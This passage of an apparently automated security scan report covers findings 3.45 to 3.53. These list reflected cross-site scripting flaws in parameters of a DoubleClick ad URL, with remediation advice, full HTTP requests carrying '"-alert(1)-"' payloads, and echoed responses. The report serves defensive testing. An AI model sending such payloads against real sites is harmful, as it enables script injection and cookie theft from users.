GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=10077531"-alert(1)-"44f2f7f79cf&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:23:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
0009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=10077531"-alert(1)-"44f2f7f79cf&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/
...[SNIP]...

3.45. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [ppartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fa1d"-alert(1)-"0003816d0c was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be placed inside a JavaScript string literal, it should be encoded for that context before insertion, with every character outside [A-Za-z0-9] replaced by its \xHH or \uHHHH escape, so that a double quote, backslash, line terminator or </script> sequence in the input cannot end the literal; HTML entity encoding alone does not help inside a script block. The parameter should also be validated against the format the ad server actually expects for it, and the same treatment is needed for every other click0 sub-parameter reflected by this path. Because the response is an HTML document served by ad.doubleclick.net, the injected script runs in that origin, not the embedding publisher's, and can read any of that host's cookies that are not flagged HttpOnly, such as those sent in the request below.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=9fa1d"-alert(1)-"0003816d0c&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:25:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6998

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=9fa1d"-alert(1)-"0003816d0c&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlCl
...[SNIP]...

3.46. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a48fa"-alert(1)-"74ddc92bd84 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be placed inside a JavaScript string literal, it should be encoded for that context before insertion, with every character outside [A-Za-z0-9] replaced by its \xHH or \uHHHH escape, so that a double quote, backslash, line terminator or </script> sequence in the input cannot end the literal; HTML entity encoding alone does not help inside a script block. The parameter should also be validated against the format the ad server actually expects for it, and the same treatment is needed for every other click0 sub-parameter reflected by this path. Because the response is an HTML document served by ad.doubleclick.net, the injected script runs in that origin, not the embedding publisher's, and can read any of that host's cookies that are not flagged HttpOnly, such as those sent in the request below.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866a48fa"-alert(1)-"74ddc92bd84&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:23:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
07-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866a48fa"-alert(1)-"74ddc92bd84&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=201
...[SNIP]...

3.47. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [ra parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f12e"-alert(1)-"b0679799619 was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be placed inside a JavaScript string literal, it should be encoded for that context before insertion, with every character outside [A-Za-z0-9] replaced by its \xHH or \uHHHH escape, so that a double quote, backslash, line terminator or </script> sequence in the input cannot end the literal; HTML entity encoding alone does not help inside a script block. The parameter should also be validated against the format the ad server actually expects for it, and the same treatment is needed for every other click0 sub-parameter reflected by this path. Because the response is an HTML document served by ad.doubleclick.net, the injected script runs in that origin, not the embedding publisher's, and can read any of that host's cookies that are not flagged HttpOnly, such as those sent in the request below.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.2434f12e"-alert(1)-"b0679799619&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:26:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.2434f12e"-alert(1)-"b0679799619&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
v
...[SNIP]...

3.48. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [rqid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d526e"-alert(1)-"a35697c3090 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385d526e"-alert(1)-"a35697c3090&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:24:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
2%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385d526e"-alert(1)-"a35697c3090&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=
...[SNIP]...

3.49. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [sg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4924b"-alert(1)-"e04afa304fa was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=5115224924b"-alert(1)-"e04afa304fa&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
t/click%3Bh%3Dv8/3af6/17/175/%2a/f%3B240390296%3B0-0%3B0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=5115224924b"-alert(1)-"e04afa304fa&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbsspor
...[SNIP]...

3.50. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c93a5"-alert(1)-"a1432e838ab was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175c93a5"-alert(1)-"a1432e838ab&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175c93a5"-alert(1)-"a1432e838ab&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT
...[SNIP]...

3.51. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The scanner labels this the sz parameter because it parses everything from sz= up to the first & as a single value, that is, the whole of 300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648. The payload 3dbe2"-alert(1)-"5a7ce4f1f97 was appended to the end of that value, so in the request below it actually lands in the r field of the click0 URL rather than in the ad size. As with the other parameters, the value is copied into a JavaScript string which is encapsulated in double quotation marks, and the input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=156483dbe2"-alert(1)-"5a7ce4f1f97&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
leclick.net/click%3Bh%3Dv8/3af6/17/175/%2a/f%3B240390296%3B0-0%3B0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=156483dbe2"-alert(1)-"5a7ce4f1f97&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=w
...[SNIP]...

3.52. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81f2c"-alert(1)-"a9944300532 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.5181f2c"-alert(1)-"a9944300532&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:26:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
id=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.5181f2c"-alert(1)-"a9944300532&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var open
...[SNIP]...

3.53. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [b parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb6a1"-alert(1)-"2fce02e725 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

